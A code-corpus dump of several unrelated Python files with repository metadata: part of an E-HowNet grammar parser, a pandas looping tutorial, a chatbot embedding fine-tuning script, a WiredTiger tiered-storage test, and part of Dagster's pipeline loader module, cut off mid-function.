"""entityOpen : LBRACE TEXT"""
p[0] = EhnParseNormalEntity(p[2])
def p_entity_function_open(self, p):
"""entityOpen : LBRACE function"""
p[0] = EhnParseFunctionEntity(p[2])
def p_entity_anchor(self, p):
"""entityAnchor : entityOpen anchor"""
p[1].anchor = p[2]
p[0] = p[1]
def p_entity_feature0(self, p):
"""entityFeature : entityOpen COLON feature
| entityAnchor COLON feature"""
p[1].add_feature(p[3])
p[0] = p[1]
def p_entity_feature(self, p):
"""entityFeature : entityFeature COMMA feature"""
p[1].add_feature(p[3])
p[0] = p[1]
def p_entity_close(self, p):
"""entity : entityOpen RBRACE
| entityAnchor RBRACE
| entityFeature RBRACE"""
p[0] = p[1]
# Reference
def p_reference_coindex(self, p):
"""reference : LBRACE COINDEX RBRACE"""
p[0] = EhnParseCoindexReference(p[2])
def p_reference_subject(self, p):
"""reference : LBRACE COINDEX0 RBRACE"""
p[0] = EhnParseSubjectReference()
def p_reference_tilde(self, p):
"""reference : LBRACE TILDE RBRACE"""
p[0] = EhnParseTildeReference()
# Placeholder
def p_restriction(self, p):
"""restriction : SLASH entity
| SLASH reference"""
p[0] = EhnParseRestrictionPlaceholder(p[2])
def p_restriction_anchor(self, p):
"""restriction : SLASH entity anchor
| SLASH reference anchor"""
p[0] = EhnParseRestrictionPlaceholder(p[2], anchor=p[3])
def p_any(self, p):
"""any : LBRACE RBRACE"""
p[0] = EhnParseAnyPlaceholder()
# Feature
def p_feature(self, p):
"""feature : TEXT EQUAL entity
| TEXT EQUAL reference
| TEXT EQUAL restriction
| TEXT EQUAL any"""
p[0] = EhnParseNormalFeature(p[1], p[3])
def p_function_feature(self, p):
"""feature : function EQUAL entity
| function EQUAL reference
| function EQUAL restriction
| function EQUAL any"""
p[0] = EhnParseFunctionFeature(p[1], p[3])
# Function
def p_function_any(self, p):
"""function : TEXT LPAREN RPAREN"""
p[0] = EhnParseFunction(p[1], EhnParseAnyPlaceholder())
def p_function_restriction(self, p):
"""function : TEXT LPAREN restriction RPAREN"""
p[0] = EhnParseFunction(p[1], p[3])
def p_function_open(self, p):
"""functionOpen : TEXT LPAREN entity
| TEXT LPAREN reference"""
p[0] = EhnParseFunction(p[1], p[3])
def p_function_argument(self, p):
"""functionArgument : functionOpen COMMA entity
| functionOpen COMMA reference
| functionArgument COMMA entity
| functionArgument COMMA reference"""
p[1].add_argument(p[3])
p[0] = p[1]
def p_function_close(self, p):
"""function : functionOpen RPAREN
| functionArgument RPAREN"""
p[0] = p[1]
# Anchor
def p_anchor(self, p):
"""anchor : ULINE COINDEX"""
p[0] = EhnParseAnchor(p[2])
# Invoke the parser
def __call__(self, data: str, *args, debug=False, **kwargs):
if debug:
print(data)
for tok in self.lexer(data):
print(tok)
ret = self._parser.parse(data, lexer=self._lexer, *args, debug=debug, **kwargs)
return ret
class EhnParser(_EhnParser):
"""E-HowNet Parser.
.. method:: __call__(self, data: str)
Run parsing.
"""
################################################################################################################################
# Utility
#
def _isnumber(name):
try:
float(name)
return True
except ValueError:
return False
def _is_coindex(name):
return _is_coindex.pattern.match(name)
_is_coindex.pattern = re.compile(r"x[0-9]*")
| ckiplab/ehownet | ehn/parse/parser.py | parser.py | py | 8,932 | python | en | code | 10 | github-code | 36 |
71938312423 | # Definition of dictionary
europe = {'spain': 'madrid', 'france': 'paris', 'germany': 'berlin',
'norway': 'oslo', 'italy': 'rome', 'poland': 'warsaw', 'austria': 'vienna'}
# Iterate over europe
for key, value in europe.items():
print("the capital of " + key + " is " + value)
#Iterating over Dataframe
#Printing labels and each row as a series
import pandas as pd
new_york_demo = pd.read_csv('Demographic_Statistics_By_Zip_Code.csv', index_col=0)
for lab,row in new_york_demo.iterrows():
print(lab)
print(row)
#Iterate and Print a specific column
#itter does create a new pandas series on each iteration == INEFFICIENT
for lab, row in new_york_demo.iterrows() :
print(str(lab)+": "+ str(row['COUNT GENDER TOTAL']))
#Adding a new calculated column and appying a function
for lab, row in new_york_demo.iterrows():
new_york_demo.loc[lab, "count_gender_total"] = row['COUNT GENDER TOTAL']/2
print(new_york_demo)
#Using apply function - be careful with methods and functions
new_york_demo["Percent Gender Total"] = new_york_demo['PERCENT GENDER TOTAL']/2
#new_york_demo["Percent Gender Total"] = new_york_demo['PERCENT GENDER TOTAL'].apply(some function)
| AlucarD980/d4t4-c4mp | Looping Data Structures.py | Looping Data Structures.py | py | 1,187 | python | en | code | 0 | github-code | 36 |
30438808856 | """
TFE - Chatbot Tifi - Technifutur
by Nicolas Christiaens
"""
from datasets import Dataset
from FineTuning import STSBTrainingModel
from torch.utils.data import DataLoader
import pandas as pd
from Preprocessing import Preprocessing
from transformers import AdamW,get_constant_schedule
from transformers import AutoModel,AutoTokenizer,Trainer
import torch
from tqdm.auto import tqdm
# Load the custom dataset and make our preprocessing
def getCustomDS(file="customDS.xlsx"):
df = pd.read_excel(file)
df["sentence1"] = df["sentence1"].apply(Preprocessing)
df["sentence2"] = df["sentence2"].apply(Preprocessing)
df["score"] = df["score"].astype(float)
dataset = Dataset.from_pandas(df)
return dataset
if __name__ == "__main__":
# Inform the user if no GPU is detected
if torch.cuda.is_available() is True:
device = "cuda"
else:
print("Pas de GPU pour le training")
# Read the custom dataset
train = getCustomDS()
# Set Global Parameters
max_length = 128
model_name = "Model_SentenceEmbedding/Finetuning/Final_model"
model_save = "Model_SentenceEmbedding/Custom/Final_model"
batch_size = 16
learning_rate = 2e-5
weight_decay = 0.01
tokenizer = AutoTokenizer.from_pretrained(model_name)
num_epochs = 2
# Create the tokenize function
def tokenize1(df):
return tokenizer(df["sentence1"],padding=True,truncation=True,max_length=max_length)
def tokenize2(df):
return tokenizer(df["sentence2"],padding=True,truncation=True,max_length=max_length)
# Transform in the correct form : ['input_ids1', 'attention_mask1', 'input_ids2', 'attention_mask2','score']
train_encoded = train.map(tokenize1,batched=True,batch_size=None)
train_encoded = train_encoded.rename_column("input_ids","input_ids1")
train_encoded = train_encoded.rename_column("attention_mask","attention_mask1")
train_encoded = train_encoded.map(tokenize2,batched=True,batch_size=None)
train_encoded = train_encoded.rename_column("input_ids","input_ids2")
train_encoded = train_encoded.rename_column("attention_mask","attention_mask2")
train_encoded = train_encoded.remove_columns(["sentence1"])
train_encoded = train_encoded.remove_columns(["sentence2"])
train_encoded = train_encoded.remove_columns(["Old Similarity"])
# Set the correct format
train_encoded.set_format("torch")
# Create the Dataloader
trainloader = DataLoader(train_encoded,shuffle=True,batch_size=batch_size)
# Load the model used as body
body = AutoModel.from_pretrained(model_name,max_length=max_length)
# Create the training model
model = STSBTrainingModel(body=body).to(device)
# Load the model and it
optimizer = AdamW(model.parameters(),lr=learning_rate,weight_decay=weight_decay)
training_steps = num_epochs*len(trainloader)
scheduler = get_constant_schedule(optimizer=optimizer)
# Set up the progress bar
progress_bar = tqdm(range(training_steps))
# Loss keeper
loss_train = []
# Get the loss without training (epoch 0)
tmp_loss = []
for batch in trainloader:
# Batch to GPU
batch = {k: v.to(device) for k, v in batch.items()}
# Predict the batch (no gradients needed)
with torch.no_grad():
loss,_ = model(**batch)
# Append the loss
tmp_loss.append(loss.item())
# Make the loss independant to the batch size
tmp_loss = sum(tmp_loss)/len(trainloader)
# Append the epoch training loss
loss_train.append(tmp_loss)
# Train the model
for epoch in range(num_epochs):
model.train()
tmp_loss = []
for batch in trainloader:
# Clear the gradient
optimizer.zero_grad()
# Batch to GPU
batch = {k: v.to(device) for k, v in batch.items()}
# Predict the batch
loss,_ = model(**batch)
# Compute the gradient
loss.backward()
# Make the step of training
optimizer.step()
scheduler.step()
# Update the progess bar
progress_bar.update(1)
# Add the loss
tmp_loss.append(loss.item())
# Make the loss independant to the batch size
tmp_loss = sum(tmp_loss)/len(trainloader)
# Append the epoch training loss
loss_train.append(tmp_loss)
# Save the trained model with the tokenizer
trainer = Trainer(model=body,tokenizer=tokenizer)
trainer.save_model(model_save)
| TheCricri/TFE_Chatbot_Tifi | CustomFineTuning.py | CustomFineTuning.py | py | 4,735 | python | en | code | 0 | github-code | 36 |
36956009049 | from helper_tiered import TieredConfigMixin, gen_tiered_storage_sources, get_conn_config
from wtscenario import make_scenarios
import fnmatch, os, wttest
class test_tiered17(TieredConfigMixin, wttest.WiredTigerTestCase):
tiered_storage_sources = gen_tiered_storage_sources()
saved_conn = ''
uri = "table:test_tiered"
shutdown = [
('clean', dict(clean=True)),
('unclean', dict(clean=False)),
]
def conn_config(self):
if self.is_tiered_scenario():
self.saved_conn = get_conn_config(self) + ')'
return self.saved_conn
scenarios = make_scenarios(tiered_storage_sources, shutdown)
def get_object_files(self):
object_files = fnmatch.filter(os.listdir('.'), "*.wtobj") + fnmatch.filter(os.listdir('.'), '*.wt')
return object_files
def verify_checkpoint(self):
obj_files_orig = self.get_object_files()
ckpt_cursor = self.session.open_cursor(self.uri, None, 'checkpoint=WiredTigerCheckpoint')
ckpt_cursor.close()
obj_files = self.get_object_files()
# Check that no additional object files have been created after opening the checkpoint.
self.assertTrue(len(obj_files_orig) == len(obj_files))
def populate(self):
# Create and populate a table.
self.session.create(self.uri, "key_format=S,value_format=S")
c = self.session.open_cursor(self.uri)
c["a"] = "a"
c["b"] = "b"
# Do a checkpoint and flush operation.
self.session.checkpoint('flush_tier=(enabled)')
# Add more data but don't do a checkpoint or flush in the unclean shutdown scenario.
if not self.clean:
c["c"] = "c"
c["d"] = "d"
c.close()
def test_open_readonly_conn(self):
self.populate()
self.verify_checkpoint()
obj_files_orig = self.get_object_files()
# Re-open the connection but in readonly mode.
conn_params = 'readonly=true,' + self.saved_conn
self.reopen_conn(config = conn_params)
obj_files = self.get_object_files()
# Check that no additional object files have been created after re-opening the connection.
self.assertTrue(len(obj_files_orig) == len(obj_files))
self.close_conn()
# Check that no additional object files have been created after closing the connection.
obj_files = self.get_object_files()
self.assertTrue(len(obj_files_orig) == len(obj_files))
def test_open_readonly_cursor(self):
self.populate()
obj_files_orig = self.get_object_files()
# Open the database in readonly mode.
self.reopen_conn(config = self.saved_conn)
c = self.session.open_cursor(self.uri, None, "readonly=true")
obj_files = self.get_object_files()
# Check that no additional object files have been created after re-opening the connection.
self.assertTrue(len(obj_files_orig) == len(obj_files))
c.close()
self.close_conn()
# Check that no additional object files have been created after closing the connection.
obj_files = self.get_object_files()
self.assertTrue(len(obj_files_orig) == len(obj_files))
if __name__ == '__main__':
wttest.run()
| mongodb/mongo | src/third_party/wiredtiger/test/suite/test_tiered17.py | test_tiered17.py | py | 3,276 | python | en | code | 24,670 | github-code | 36 |
495049737 | import imp
import importlib
import inspect
import os
import sys
import weakref
from collections import namedtuple
from enum import Enum
from dagster import check
from dagster.core.definitions.partition import RepositoryPartitionsHandle
from dagster.core.definitions.pipeline import PipelineDefinition
from dagster.core.definitions.repository import RepositoryDefinition
from dagster.core.errors import DagsterInvariantViolationError
from dagster.core.scheduler import SchedulerHandle
from dagster.utils import load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPHEMERAL_NAME = '<<unnamed>>'
class PartitionLoaderEntrypoint(
namedtuple('_PartitionLoaderEntrypoint', 'module module_name fn_name from_handle')
):
def __new__(cls, module, module_name, fn_name, from_handle=None):
return super(PartitionLoaderEntrypoint, cls).__new__(
cls, module, module_name, fn_name, from_handle
)
def perform_load(self):
# in the decorator case the attribute will be the actual definition
if not hasattr(self.module, self.fn_name):
raise DagsterInvariantViolationError(
'{name} not found in module {module}.'.format(name=self.fn_name, module=self.module)
)
fn_partitions = getattr(self.module, self.fn_name)
if isinstance(fn_partitions, RepositoryPartitionsHandle):
inst = fn_partitions
elif callable(fn_partitions):
handle = fn_partitions()
if not isinstance(handle, RepositoryPartitionsHandle):
raise DagsterInvariantViolationError(
'{fn_name} is a function but must return a RepositoryPartitionsHandle.'.format(
fn_name=self.fn_name
)
)
inst = handle
else:
raise DagsterInvariantViolationError(
'{fn_name} must be a function that returns a RepositoryPartitionstHandle.'.format(
fn_name=self.fn_name
)
)
return inst
@staticmethod
def from_file_target(python_file, fn_name, from_handle=None):
file_directory = os.path.dirname(python_file)
if file_directory not in sys.path:
sys.path.append(file_directory)
module_name = os.path.splitext(os.path.basename(python_file))[0]
module = imp.load_source(module_name, python_file)
return PartitionLoaderEntrypoint(module, module_name, fn_name, from_handle)
@staticmethod
def from_module_target(module_name, fn_name, from_handle=None):
module = importlib.import_module(module_name)
return PartitionLoaderEntrypoint(module, module_name, fn_name, from_handle)
@staticmethod
def from_yaml(file_path, from_handle=None):
check.str_param(file_path, 'file_path')
config = load_yaml_from_path(file_path)
if not config.get('partitions'):
return None
partitions = check.dict_elem(config, 'partitions')
module_name = check.opt_str_elem(partitions, 'module')
file_name = check.opt_str_elem(partitions, 'file')
fn_name = check.str_elem(partitions, 'fn')
if module_name:
return PartitionLoaderEntrypoint.from_module_target(module_name, fn_name, from_handle)
else:
# rebase file in config off of the path in the config file
file_name = os.path.join(os.path.dirname(os.path.abspath(file_path)), file_name)
return PartitionLoaderEntrypoint.from_file_target(file_name, fn_name, from_handle)
class SchedulerLoaderEntrypoint(
namedtuple('_SchedulerLoaderEntrypoint', 'module module_name fn_name from_handle')
):
def __new__(cls, module, module_name, fn_name, from_handle=None):
return super(SchedulerLoaderEntrypoint, cls).__new__(
cls, module, module_name, fn_name, from_handle
)
def perform_load(self, artifacts_dir):
artifacts_dir = check.str_param(artifacts_dir, 'artifacts_dir')
repository_name = self.from_handle.build_repository_definition().name
# in the decorator case the attribute will be the actual definition
if not hasattr(self.module, self.fn_name):
raise DagsterInvariantViolationError(
'{name} not found in module {module}.'.format(name=self.fn_name, module=self.module)
)
fn_scheduler = getattr(self.module, self.fn_name)
if callable(fn_scheduler):
scheduler = fn_scheduler(artifacts_dir=artifacts_dir, repository_name=repository_name)
if not isinstance(scheduler, SchedulerHandle):
raise DagsterInvariantViolationError(
'{fn_name} is a function but must return a SchedulerHandle.'.format(
fn_name=self.fn_name
)
)
inst = scheduler
else:
raise DagsterInvariantViolationError(
'{fn_name} must be a function that returns a SchedulerHandle.'.format(
fn_name=self.fn_name
)
)
return inst
@staticmethod
def from_file_target(python_file, fn_name, from_handle=None):
file_directory = os.path.dirname(python_file)
if file_directory not in sys.path:
sys.path.append(file_directory)
module_name = os.path.splitext(os.path.basename(python_file))[0]
module = imp.load_source(module_name, python_file)
return SchedulerLoaderEntrypoint(module, module_name, fn_name, from_handle)
@staticmethod
def from_module_target(module_name, fn_name, from_handle=None):
module = importlib.import_module(module_name)
return SchedulerLoaderEntrypoint(module, module_name, fn_name, from_handle)
@staticmethod
def from_yaml(file_path, from_handle=None):
check.str_param(file_path, 'file_path')
config = load_yaml_from_path(file_path)
if not config.get('scheduler'):
return None
scheduler = check.dict_elem(config, 'scheduler')
module_name = check.opt_str_elem(scheduler, 'module')
file_name = check.opt_str_elem(scheduler, 'file')
fn_name = check.str_elem(scheduler, 'fn')
if module_name:
return SchedulerLoaderEntrypoint.from_module_target(module_name, fn_name, from_handle)
else:
# rebase file in config off of the path in the config file
file_name = os.path.join(os.path.dirname(os.path.abspath(file_path)), file_name)
return SchedulerLoaderEntrypoint.from_file_target(file_name, fn_name, from_handle)
class LoaderEntrypoint(namedtuple('_LoaderEntrypoint', 'module module_name fn_name from_handle')):
def __new__(cls, module, module_name, fn_name, from_handle=None):
return super(LoaderEntrypoint, cls).__new__(cls, module, module_name, fn_name, from_handle)
def perform_load(self):
# in the decorator case the attribute will be the actual definition
if not hasattr(self.module, self.fn_name):
raise DagsterInvariantViolationError(
'{name} not found in module {module}.'.format(name=self.fn_name, module=self.module)
)
fn_repo_or_pipeline = getattr(self.module, self.fn_name)
# This is the @pipeline case
if isinstance(fn_repo_or_pipeline, PipelineDefinition):
inst = fn_repo_or_pipeline
# This is the define_pipeline() or define_repo() case
elif callable(fn_repo_or_pipeline):
repo_or_pipeline = fn_repo_or_pipeline()
if not isinstance(repo_or_pipeline, (RepositoryDefinition, PipelineDefinition)):
raise DagsterInvariantViolationError(
'{fn_name} is a function but must return a PipelineDefinition '
'or a RepositoryDefinition, or be decorated with @pipeline.'.format(
fn_name=self.fn_name
)
)
inst = repo_or_pipeline
else:
raise DagsterInvariantViolationError(
'{fn_name} must be a function that returns a PipelineDefinition '
'or a RepositoryDefinition, or a function decorated with @pipeline.'.format(
fn_name=self.fn_name
)
)
if self.from_handle:
return ExecutionTargetHandle.cache_handle(inst, self.from_handle)
return inst
@staticmethod
def from_file_target(python_file, fn_name, from_handle=None):
file_directory = os.path.dirname(python_file)
if file_directory not in sys.path:
sys.path.append(file_directory)
module_name = os.path.splitext(os.path.basename(python_file))[0]
module = imp.load_source(module_name, python_file)
return LoaderEntrypoint(module, module_name, fn_name, from_handle)
@staticmethod
def from_module_target(module_name, fn_name, from_handle=None):
module = importlib.import_module(module_name)
return LoaderEntrypoint(module, module_name, fn_name, from_handle)
@staticmethod
def from_yaml(file_path, from_handle=None):
check.str_param(file_path, 'file_path')
config = load_yaml_from_path(file_path)
repository_config = check.dict_elem(config, 'repository')
module_name = check.opt_str_elem(repository_config, 'module')
file_name = check.opt_str_elem(repository_config, 'file')
fn_name = check.str_elem(repository_config, 'fn')
if module_name:
return LoaderEntrypoint.from_module_target(module_name, fn_name, from_handle)
else:
# rebase file in config off of the path in the config file
file_name = os.path.join(os.path.dirname(os.path.abspath(file_path)), file_name)
return LoaderEntrypoint.from_file_target(file_name, fn_name, from_handle)
class ExecutionTargetHandleCacheEntry(
namedtuple('_ExecutionTargetHandleCacheEntry', 'handle solid_subset')
):
def __new__(cls, handle, solid_subset=None):
check.inst_param(handle, 'handle', ExecutionTargetHandle)
check.opt_list_param(solid_subset, 'solid_subset', of_type=str)
return super(ExecutionTargetHandleCacheEntry, cls).__new__(cls, handle, solid_subset)
class ExecutionTargetHandle(object):
'''ExecutionTargetHandle represents an immutable, serializable reference to a Dagster
RepositoryDefinition or PipelineDefinition, to support dynamically loading these in various
contexts (e.g. across process boundaries).
This class must remain pickle-serializable to ensure multiprocessing compatibility, and is the
one of the primary reasons that we pass this around vs. an instantiated
RepositoryDefinition/PipelineDefinition object.
### Creation
ExecutionTargetHandles can be created via the staticmethod constructors below.
- for_repo_fn
- for_repo_yaml
- for_repo_python_file
- for_repo_module
- for_pipeline_fn
- for_pipeline_python_file
- for_pipeline_module
Also, the following constructors are provided to support construction from CLI tools in
dagster.cli.load_handle:
- handle_for_repo_cli_args
- handle_for_pipeline_cli_args
Since an ExecutionTargetHandle can reference either a RepositoryDefinition or a fully-qualified
pipeline, it provides a property `is_resolved_to_pipeline` which identifies whether it is fully-
qualified to a pipeline reference.
For repository-based handles, you can use the `with_pipeline_name(pipeline_name)` method on a
repository handle to construct and return a new fully-qualified pipeline handle.
### Usage
Handle objects support the following methods to construct `*Definition` objects:
- handle.build_repository_definition() => RepositoryDefinition
- handle.build_pipeline_definition() => PipelineDefinition
These are intended to support reconstructing definitions from their serialized representations
provided by this object wherever needed during execution.
The first is supported on all handles; the second requires a fully-qualified pipeline handle.
For more advanced usage, you can also construct an entrypoint object yourself with:
- handle.entrypoint() => LoaderEntrypoint
This should not be necessary in common usage.
'''
__cache__ = weakref.WeakKeyDictionary()
'''The cache is used to cache handles used to create PipelineDefinition and
RepositoryDefinition objects, so the handles can be passed across serialization boundaries (as
for dagstermill) by solid compute logic.'''
@classmethod
def get_handle(cls, repo_or_pipeline):
'''Get the handle and, optionally, solid subset used to construct a repo or (sub-)pipeline.
Returns: Union[ExecutionTargetHandleCacheEntry, (None, None)]
'''
check.inst_param(
repo_or_pipeline, 'repo_or_pipeline', (RepositoryDefinition, PipelineDefinition)
)
return cls.__cache__.get(repo_or_pipeline) or (None, None)
@classmethod
def cache_handle(cls, repo_or_pipeline_def, handle=None, solid_names=None):
'''Record a pipeline or repository in the cache.
Args:
repo_or_pipeline_def (Union[RepositoryDefinition, PipelineDefinition]): The repo or
pipeline definition for which to cache the handle.
Kwargs:
handle (ExecutionTargetHandle): The handle to cache.
solid_names (Optional[List[str]]): The solid names constituting the constructed
sub-pipeline, if any; arg should be as for
dagster.core.definitions.pipeline.build_sub_pipeline.
'''
check.inst_param(
repo_or_pipeline_def, 'repo_or_pipeline_def', (RepositoryDefinition, PipelineDefinition)
)
check.inst_param(handle, 'handle', ExecutionTargetHandle)
check.opt_list_param(solid_names, 'solid_names', of_type=str)
cls.__cache__[repo_or_pipeline_def] = ExecutionTargetHandleCacheEntry(handle, solid_names)
return repo_or_pipeline_def
@staticmethod
def for_pipeline_fn(fn):
'''This builder is a bit magical, but it inspects its caller to determine how to build a
ExecutionTargetHandle object via python_file and fn_name.
This will work since fn_name is ensured to be in scope in the python_file caller's scope.
'''
check.callable_param(fn, 'fn')
return ExecutionTargetHandle.for_pipeline_python_file(
python_file=_get_python_file_from_previous_stack_frame(), fn_name=fn.__name__
)
@staticmethod
def for_repo_fn(fn):
'''This builder is a bit magical, but it inspects its caller to determine how to build a
ExecutionTargetHandle object via python_file and fn_name.
This will work since fn_name is ensured to be in scope in the python_file caller's scope.
'''
check.callable_param(fn, 'fn')
return ExecutionTargetHandle.for_repo_python_file(
python_file=_get_python_file_from_previous_stack_frame(), fn_name=fn.__name__
)
@staticmethod
def for_repo_yaml(repository_yaml):
'''Builds an ExecutionTargetHandle for a repository.yml file.
'''
return ExecutionTargetHandle(
_ExecutionTargetHandleData(repository_yaml=os.path.abspath(repository_yaml)),
_ExecutionTargetMode.REPOSITORY,
)
@staticmethod
def for_repo_python_file(python_file, fn_name):
'''Builds an ExecutionTargetHandle for a repository python file and function which is
expected to return a RepositoryDefinition instance.
'''
return ExecutionTargetHandle(
_ExecutionTargetHandleData(python_file=python_file, fn_name=fn_name),
_ExecutionTargetMode.REPOSITORY,
)
@staticmethod
def for_repo_module(module_name, fn_name):
'''Builds an ExecutionTargetHandle for a repository module and function which is expected
to return a RepositoryDefinition instance.
'''
return ExecutionTargetHandle(
_ExecutionTargetHandleData(module_name=module_name, fn_name=fn_name),
_ExecutionTargetMode.REPOSITORY,
)
@staticmethod
def for_pipeline_python_file(python_file, fn_name):
'''Builds an ExecutionTargetHandle for a pipeline python file and function which is expected
to return a PipelineDefinition instance.
'''
return ExecutionTargetHandle(
_ExecutionTargetHandleData(python_file=python_file, fn_name=fn_name),
_ExecutionTargetMode.PIPELINE,
is_resolved_to_pipeline=True,
)
@staticmethod
def for_pipeline_module(module_name, fn_name):
'''Builds an ExecutionTargetHandle for a pipeline python module and function which is
expected to return a PipelineDefinition instance.
'''
return ExecutionTargetHandle(
_ExecutionTargetHandleData(module_name=module_name, fn_name=fn_name),
_ExecutionTargetMode.PIPELINE,
is_resolved_to_pipeline=True,
)
@staticmethod
def from_dict(handle_dict):
return ExecutionTargetHandle(
data=_ExecutionTargetHandleData(**handle_dict['data']),
mode=getattr(_ExecutionTargetMode, handle_dict['mode']),
is_resolved_to_pipeline=handle_dict['is_resolved_to_pipeline'],
)
def to_dict(self):
return {
'data': self.data._asdict(),
'mode': self.mode.name,
'is_resolved_to_pipeline': self.is_resolved_to_pipeline,
}
def with_pipeline_name(self, pipeline_name):
'''Returns a new ExecutionTargetHandle that references the pipeline "pipeline_name" within
the repository.
'''
if self.is_resolved_to_pipeline and self.data.pipeline_name == pipeline_name:
return self
check.invariant(
not (self.is_resolved_to_pipeline and self.data.pipeline_name is not None),
'''ExecutionTargetHandle already references a pipeline named {pipeline_name}, cannot
change to {new_pipeline_name}.'''.format(
pipeline_name=self.data.pipeline_name, new_pipeline_name=pipeline_name
),
)
data = self.data._replace(pipeline_name=pipeline_name)
return ExecutionTargetHandle(
data, mode=_ExecutionTargetMode.PIPELINE, is_resolved_to_pipeline=True
)
def build_scheduler_handle(self, artifacts_dir):
# Cannot create a scheduler handle if the target mode is not a repository
if self.mode != _ExecutionTargetMode.REPOSITORY:
return None
entrypoint = self.scheduler_handle_entrypoint
# entrypoint will be None if the repository yaml file does not define a scheduler entrypoint
if not entrypoint:
return None
return self.scheduler_handle_entrypoint.perform_load(artifacts_dir)
def build_partitions_handle(self):
if self.mode != _ExecutionTargetMode.REPOSITORY:
return None
entrypoint = self.partition_handle_entrypoint
if not entrypoint:
return None
return self.partition_handle_entrypoint.perform_load()
def build_repository_definition(self):
'''Rehydrates a RepositoryDefinition from an ExecutionTargetHandle object.
If this ExecutionTargetHandle points to a pipeline, we create an ephemeral repository to
wrap the pipeline and return it.
'''
obj = self.entrypoint.perform_load()
if self.mode == _ExecutionTargetMode.REPOSITORY:
# User passed in a function that returns a pipeline definition, not a repository. See:
# https://github.com/dagster-io/dagster/issues/1439
if isinstance(obj, PipelineDefinition):
return ExecutionTargetHandle.cache_handle(
RepositoryDefinition(name=EPHEMERAL_NAME, pipeline_defs=[obj]),
*ExecutionTargetHandle.get_handle(obj)
)
return ExecutionTargetHandle.cache_handle(check.inst(obj, RepositoryDefinition), self)
elif self.mode == _ExecutionTargetMode.PIPELINE:
# This handle may have originally targeted a repository and then been qualified with
# with_pipeline_name()
if isinstance(obj, RepositoryDefinition):
return ExecutionTargetHandle.cache_handle(
obj, *ExecutionTargetHandle.get_handle(obj)
)
return ExecutionTargetHandle.cache_handle(
RepositoryDefinition(name=EPHEMERAL_NAME, pipeline_defs=[obj]),
*ExecutionTargetHandle.get_handle(obj)
)
else:
check.failed('Unhandled mode {mode}'.format(mode=self.mode))
def build_pipeline_definition(self):
'''Rehydrates a PipelineDefinition from an ExecutionTargetHandle object.
'''
if self.mode == _ExecutionTargetMode.REPOSITORY:
raise DagsterInvariantViolationError(
'Cannot construct a pipeline from a repository-based ExecutionTargetHandle without'
' a pipeline name. Use with_pipeline_name() to construct a pipeline'
' ExecutionTargetHandle.'
)
elif self.mode == _ExecutionTargetMode.PIPELINE:
obj = self.entrypoint.perform_load()
if isinstance(obj, PipelineDefinition):
return ExecutionTargetHandle.cache_handle(obj, self)
else:
return ExecutionTargetHandle.cache_handle(
obj.get_pipeline(self.data.pipeline_name), self
)
else:
check.failed('Unhandled mode {mode}'.format(mode=self.mode))
@property
def partition_handle_entrypoint(self):
return self.data.get_partition_entrypoint(from_handle=self)
@property
def scheduler_handle_entrypoint(self):
return self.data.get_scheduler_entrypoint(from_handle=self)
@property
def entrypoint(self):
if self.mode == _ExecutionTargetMode.REPOSITORY:
return self.data.get_repository_entrypoint(from_handle=self)
elif self.mode == _ExecutionTargetMode.PIPELINE:
return self.data.get_pipeline_entrypoint(from_handle=self)
else:
check.failed('Unhandled mode {mode}'.format(mode=self.mode))
def __init__(self, data, mode, is_resolved_to_pipeline=False):
'''Not intended to be invoked directly. Use one of the factory functions above.
'''
self.data = check.inst_param(data, 'data', _ExecutionTargetHandleData)
self.mode = check.inst_param(mode, 'mode', _ExecutionTargetMode)
# By default, this only resolves to a repository
self.is_resolved_to_pipeline = is_resolved_to_pipeline
def _get_python_file_from_previous_stack_frame():
'''inspect.stack() lets us introspect the call stack; inspect.stack()[1] is the previous
stack frame.
In Python < 3.5, this is just a tuple, of which the python file of the previous frame is the 1st
element.
In Python 3.5+, this is a FrameInfo namedtuple instance; the python file of the previous frame
remains the 1st element.
'''
# Since this is now a function in this file, we need to go back two hops to find the
# callsite file.
previous_stack_frame = inspect.stack()[2]
# See: https://docs.python.org/3/library/inspect.html
if sys.version_info.major == 3 and sys.version_info.minor >= 5:
check.inst(previous_stack_frame, inspect.FrameInfo)
else:
check.inst(previous_stack_frame, tuple)
python_file = previous_stack_frame[1]
return os.path.abspath(python_file)
class _ExecutionTargetMode(Enum):
PIPELINE = 1
REPOSITORY = 2
class _ExecutionTargetHandleData(
namedtuple(
'_ExecutionTargetHandleData',
'repository_yaml module_name python_file fn_name pipeline_name',
)
):
def __new__(
cls,
repository_yaml=None,
module_name=None,
python_file=None,
fn_name=None,
pipeline_name=None,
):
return super(_ExecutionTargetHandleData, cls).__new__(
cls,
repository_yaml=check.opt_str_param(repository_yaml, 'repository_yaml'),
module_name=check.opt_str_param(module_name, 'module_name'),
python_file=check.opt_str_param(python_file, 'python_file'),
fn_name=check.opt_str_param(fn_name, 'fn_name'),
pipeline_name=check.opt_str_param(pipeline_name, 'pipeline_name'),
)
def get_partition_entrypoint(self, from_handle=None):
if self.repository_yaml:
return PartitionLoaderEntrypoint.from_yaml(
self.repository_yaml, from_handle=from_handle
)
def get_scheduler_entrypoint(self, from_handle=None):
if self.repository_yaml:
return SchedulerLoaderEntrypoint.from_yaml(
self.repository_yaml, from_handle=from_handle
)
def get_repository_entrypoint(self, from_handle=None):
if self.repository_yaml:
return LoaderEntrypoint.from_yaml(self.repository_yaml, from_handle=from_handle)
elif self.module_name and self.fn_name:
return LoaderEntrypoint.from_module_target(
module_name=self.module_name, fn_name=self.fn_name, from_handle=from_handle
)
elif self.python_file and self.fn_name:
return LoaderEntrypoint.from_file_target(
python_file=self.python_file, fn_name=self.fn_name, from_handle=from_handle
)
else:
raise DagsterInvariantViolationError(
(
'You have attempted to load a repository with an invalid '
'combination of properties. repository_yaml {repository_yaml} '
'module_name {module_name} python_file {python_file} '
'fn_name {fn_name}.'
).format(
repository_yaml=self.repository_yaml,
module_name=self.module_name,
fn_name=self.fn_name,
python_file=self.python_file,
)
)
def get_pipeline_entrypoint(self, from_handle=None):
if self.python_file and self.fn_name:
return LoaderEntrypoint.from_file_target(
python_file=self.python_file, fn_name=self.fn_name, from_handle=from_handle
)
elif self.module_name and self.fn_name:
return LoaderEntrypoint.from_module_target(
module_name=self.module_name, fn_name=self.fn_name, from_handle=from_handle
)
elif self.pipeline_name:
return self.get_repository_entrypoint(from_handle=from_handle)
raise DagsterInvariantViolationError(
(
'You have attempted to directly load a pipeline with an invalid '
'combination of properties module_name {module_name} python_file '
'{python_file} fn_name {fn_name}.'
).format(
